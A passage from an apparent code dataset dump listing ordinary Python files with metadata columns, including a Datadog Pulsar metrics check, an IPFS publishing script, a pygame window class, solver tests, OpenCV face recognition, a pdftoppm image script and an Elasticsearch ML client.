'scrape_duration_seconds': 'scrape_duration_seconds',
'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling',
'scrape_samples_scraped': 'scrape_samples_scraped',
'topic_load_times': 'topic_load_times',
'topic_load_times_count': 'topic_load_times_count',
'topic_load_times_sum': 'topic_load_times_sum',
'up': 'broker.up',
}
instance.update(
{
'prometheus_url': url,
'namespace': self.NAMESPACE,
'metrics': [self.metrics_mapper],
'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True),
'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True),
}
)
super(PulsarCheck, self).__init__(name, init_config, instances)
| <filename>pulsar/datadog_checks/pulsar/check.py
from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck
EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar'
class PulsarCheck(OpenMetricsBaseCheck):
"""
PulsarCheck derives from AgentCheck that provides the required check method
"""
def __init__(self, name, init_config, instances=None):
instance = instances[0]
url = instance.get('prometheus_url')
if url is None:
raise ConfigurationError("Unable to find prometheus_url in config file.")
self.NAMESPACE = 'kesque.pulsar'
self.metrics_mapper = {
'pulsar_consumer_available_permits': 'consumer.available_permits',
'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages',
'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out',
'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver',
'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out',
'pulsar_consumer_unacked_messages': 'consumer.unacked_messages',
'pulsar_consumers_count': 'consumers_count',
'pulsar_entry_size_count': 'entry_size_count',
'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb',
'pulsar_entry_size_le_128': 'entry_size_le_128',
'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb',
'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb',
'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb',
'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb',
'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb',
'pulsar_entry_size_le_512': 'entry_size_le_512',
'pulsar_entry_size_le_overflow': 'entry_size_le_overflow',
'pulsar_entry_size_sum': 'entry_size_sum',
'pulsar_in_bytes_total': 'in_bytes_total',
'pulsar_in_messages_total': 'in_messages_total',
'pulsar_msg_backlog': 'msg_backlog',
'pulsar_out_bytes_total': 'out_bytes_total',
'pulsar_out_messages_total': 'out_messages_total',
'pulsar_producers_count': 'producers_count',
'pulsar_rate_in': 'rate_in',
'pulsar_rate_out': 'rate_out',
'pulsar_replication_backlog': 'replication.backlog',
'pulsar_replication_rate_in': 'replication.rate_in',
'pulsar_replication_rate_out': 'replication.rate_out',
'pulsar_replication_throughput_in': 'replication.throughput_in',
'pulsar_replication_throughput_out': 'replication.throughput_out',
'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit',
'pulsar_storage_backlog_size': 'storage.backlog_size',
'pulsar_storage_read_rate': 'storage.read_rate',
'pulsar_storage_offloaded_size': 'storage.offloaded_size',
'pulsar_storage_size': 'storage.size',
'pulsar_storage_write_latency_count': 'storage.write_latency_count',
'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5',
'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1',
'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10',
'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100',
'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000',
'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20',
'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200',
'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5',
'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50',
'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow',
'pulsar_storage_write_latency_sum': 'storage.write_latency_sum',
'pulsar_storage_write_rate': 'storage.write_rate',
'pulsar_subscription_back_log': 'subscription.back_log',
'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed',
'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages',
'pulsar_subscription_delayed': 'subscription.delayed',
'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out',
'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver',
'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out',
'pulsar_subscription_unacked_messages': 'subscription.unacked_messages',
'pulsar_subscriptions_count': 'subscriptions.count',
'pulsar_throughput_in': 'throughput_in',
'pulsar_throughput_out': 'throughput_out',
'pulsar_topics_count': 'topics_count',
'scrape_duration_seconds': 'scrape_duration_seconds',
'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling',
'scrape_samples_scraped': 'scrape_samples_scraped',
'topic_load_times': 'topic_load_times',
'topic_load_times_count': 'topic_load_times_count',
'topic_load_times_sum': 'topic_load_times_sum',
'up': 'broker.up',
}
instance.update(
{
'prometheus_url': url,
'namespace': self.NAMESPACE,
'metrics': [self.metrics_mapper],
'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True),
'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True),
}
)
super(PulsarCheck, self).__init__(name, init_config, instances)
| en | 0.794721 | PulsarCheck derives from AgentCheck that provides the required check method | 2.239444 | 2 |
Chapter11/publish_horoscope1_in_another_ipns.py | HowToBeCalculated/Hands-On-Blockchain-for-Python-Developers | 62 | 9123 | import ipfsapi
c = ipfsapi.connect()
peer_id = c.key_list()['Keys'][1]['Id']
c.name_publish('QmYjYGKXqo36GDt6f6qvp9qKAsrc72R9y88mQSLvogu8Ub', key='another_key')
result = c.cat('/ipns/' + peer_id)
print(result)
| import ipfsapi
c = ipfsapi.connect()
peer_id = c.key_list()['Keys'][1]['Id']
c.name_publish('QmYjYGKXqo36GDt6f6qvp9qKAsrc72R9y88mQSLvogu8Ub', key='another_key')
result = c.cat('/ipns/' + peer_id)
print(result)
| none | 1 | 2.083699 | 2 |
|
magie/window.py | NiumXp/Magie | 1 | 9124 | <filename>magie/window.py<gh_stars>1-10
import pygame
class Window:
def __init__(self, title: str, dimension: tuple):
self.surface = None
self.initial_title = title
self.initial_dimension = dimension
@property
def title(self) -> str:
"""Returns the title of the window."""
return pygame.display.get_caption()
@title.setter
def title(self, new_title: str):
"""Sets the window title."""
pygame.display.set_caption(new_title)
def set_title(self, new_title: str):
"""Alias for `Window.title = ...`."""
self.title = new_title
@property
def width(self) -> int:
"""Alias for Window.get_width."""
return self.get_width()
@property
def height(self) -> int:
"""Alias for Window.get_height."""
return self.get_height()
@property
def size(self) -> tuple:
"""Alias for Window.get_size."""
return self.get_size()
def get_width(self) -> int:
"""Returns the widget of the window."""
if self.surface:
return self.surface.get_width()
return self.initial_dimension[0]
def get_height(self) -> int:
"""Returns the height of the window."""
if self.surface:
return self.surface.get_height()
return self.initial_dimension[1]
def get_size(self) -> tuple:
"""Returns the size of the size."""
if self.surface:
return self.surface.get_size()
return self.initial_dimension
def build(self):
"""Build the window."""
self.surface = pygame.display.set_mode(self.initial_dimension)
self.set_title(self.initial_title)
return self
| <filename>magie/window.py<gh_stars>1-10
import pygame
class Window:
def __init__(self, title: str, dimension: tuple):
self.surface = None
self.initial_title = title
self.initial_dimension = dimension
@property
def title(self) -> str:
"""Returns the title of the window."""
return pygame.display.get_caption()
@title.setter
def title(self, new_title: str):
"""Sets the window title."""
pygame.display.set_caption(new_title)
def set_title(self, new_title: str):
"""Alias for `Window.title = ...`."""
self.title = new_title
@property
def width(self) -> int:
"""Alias for Window.get_width."""
return self.get_width()
@property
def height(self) -> int:
"""Alias for Window.get_height."""
return self.get_height()
@property
def size(self) -> tuple:
"""Alias for Window.get_size."""
return self.get_size()
def get_width(self) -> int:
"""Returns the widget of the window."""
if self.surface:
return self.surface.get_width()
return self.initial_dimension[0]
def get_height(self) -> int:
"""Returns the height of the window."""
if self.surface:
return self.surface.get_height()
return self.initial_dimension[1]
def get_size(self) -> tuple:
"""Returns the size of the size."""
if self.surface:
return self.surface.get_size()
return self.initial_dimension
def build(self):
"""Build the window."""
self.surface = pygame.display.set_mode(self.initial_dimension)
self.set_title(self.initial_title)
return self
| en | 0.625734 | Returns the title of the window. Sets the window title. Alias for `Window.title = ...`. Alias for Window.get_width. Alias for Window.get_height. Alias for Window.get_size. Returns the widget of the window. Returns the height of the window. Returns the size of the size. Build the window. | 3.242368 | 3 |
tests/optimize/test_newton_raphson_hypo.py | dwillmer/fastats | 26 | 9125 | <gh_stars>10-100
from hypothesis import given, assume, settings
from hypothesis.strategies import floats
from numpy import cos
from pytest import approx
from fastats.optimise.newton_raphson import newton_raphson
def func(x):
return x**3 - x - 1
def less_or_equal(x, compared_to, rel=1e-6):
return ((x < compared_to)
or ((x - compared_to) == approx(0.0, rel=rel))
or (x == approx(x, rel=rel)))
nr_func = newton_raphson(1, 1e-6, root=func, return_callable=True)
@given(floats(min_value=0.01, max_value=3.5))
def test_minimal(x):
"""
Tests that the value output from the solver
is less than or equal to the value of the
objective.
"""
eps = 1e-12
value = nr_func(x, eps)
assume(func(x) > 0.0)
assert less_or_equal(value, compared_to=func(x))
def cos_func(x):
return cos(x) - 2 * x
nr_cos = newton_raphson(0.5, 1e-6, root=cos_func, return_callable=True)
@given(floats(min_value=0.3, max_value=0.8))
@settings(deadline=None)
def test_cos_minus_2x(x):
value = nr_cos(x, 1e-6)
assert less_or_equal(value, compared_to=cos_func(x))
if __name__ == '__main__':
import pytest
pytest.main([__file__])
| from hypothesis import given, assume, settings
from hypothesis.strategies import floats
from numpy import cos
from pytest import approx
from fastats.optimise.newton_raphson import newton_raphson
def func(x):
return x**3 - x - 1
def less_or_equal(x, compared_to, rel=1e-6):
return ((x < compared_to)
or ((x - compared_to) == approx(0.0, rel=rel))
or (x == approx(x, rel=rel)))
nr_func = newton_raphson(1, 1e-6, root=func, return_callable=True)
@given(floats(min_value=0.01, max_value=3.5))
def test_minimal(x):
"""
Tests that the value output from the solver
is less than or equal to the value of the
objective.
"""
eps = 1e-12
value = nr_func(x, eps)
assume(func(x) > 0.0)
assert less_or_equal(value, compared_to=func(x))
def cos_func(x):
return cos(x) - 2 * x
nr_cos = newton_raphson(0.5, 1e-6, root=cos_func, return_callable=True)
@given(floats(min_value=0.3, max_value=0.8))
@settings(deadline=None)
def test_cos_minus_2x(x):
value = nr_cos(x, 1e-6)
assert less_or_equal(value, compared_to=cos_func(x))
if __name__ == '__main__':
import pytest
pytest.main([__file__]) | en | 0.951294 | Tests that the value output from the solver is less than or equal to the value of the objective. | 2.578547 | 3 |
faceRecognition.py | sequery/Face-Recognition-Project | 2 | 9126 | import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image below function returns rectangle for face detected alongwith gray scale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
| import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image below function returns rectangle for face detected alongwith gray scale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
| en | 0.844148 | # This module contains all common functions that are called in tester.py file # Given an image below function returns rectangle for face detected alongwith gray scale image # convert color image to grayscale # Load haar classifier # detectMultiScale returns rectangles # Given a directory below function returns part of gray_img which is face alongwith its label/ID # Skipping files that startwith . # fetching subdirectory names # fetching image path # loading each image one by one # Calling faceDetection function to return faces detected in particular image # Since we are assuming only single person images are being fed to classifier # cropping region of interest i.e. face area from grayscale image # Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments # Below function draws bounding boxes around detected face in image # Below function writes name of person for detected label | 2.918586 | 3 |
evaluation/datasets/build_dataset_images.py | hsiehkl/pdffigures2 | 296 | 9127 | <filename>evaluation/datasets/build_dataset_images.py
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
| <filename>evaluation/datasets/build_dataset_images.py
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
| en | 0.812211 | Script to use pdftoppm to turn the pdfs into single images per page | 3.040675 | 3 |
sympy/physics/__init__.py | utkarshdeorah/sympy | 1 | 9128 | <reponame>utkarshdeorah/sympy
"""
A module that helps solving problems in physics.
"""
from . import units
from .matrices import mgamma, msigma, minkowski_tensor, mdft
__all__ = [
'units',
'mgamma', 'msigma', 'minkowski_tensor', 'mdft',
]
| """
A module that helps solving problems in physics.
"""
from . import units
from .matrices import mgamma, msigma, minkowski_tensor, mdft
__all__ = [
'units',
'mgamma', 'msigma', 'minkowski_tensor', 'mdft',
] | en | 0.925716 | A module that helps solving problems in physics. | 2.023381 | 2 |
py.py | avr8082/Hadoop | 0 | 9129 | printf("Hello world")
| printf("Hello world")
| none | 1 | 1.240308 | 1 |
|
build/python-env/lib/python2.7/site-packages/elasticsearch/client/xpack/ml.py | imiMoisesEducation/beatcookie-discbot | 1 | 9130 | from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: None
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score:
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Default
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
